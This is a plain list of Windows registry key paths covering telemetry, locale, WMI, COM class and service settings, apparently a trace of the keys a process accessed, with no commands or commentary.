HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxSessionSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxEventSizePerSession
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\AdaptiveSQM\ManifestInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\SamplingInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\SQMLogger\Start
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\schtasks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater\Id
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\Uploader
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\WDM\DREDGE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ACPI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NDIS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\portcls
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\ImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\advapi32.dll[MofResourceName]
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\KnownSvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WMIADAP.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\net.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\net1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PreviousServiceShutdown
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\winmgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\sc.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WmiPrvSE.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\WMIADAP.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\ActivationFailureLoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\SystemCritical
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NoResyncPerf
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\ADAP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ADAPDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LodCtrDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToFullDredge
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToTerminateAdap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastFullDredgeTimestamp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\AECFFC7E
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\InprocHandler
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winmgmt\Parameters
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
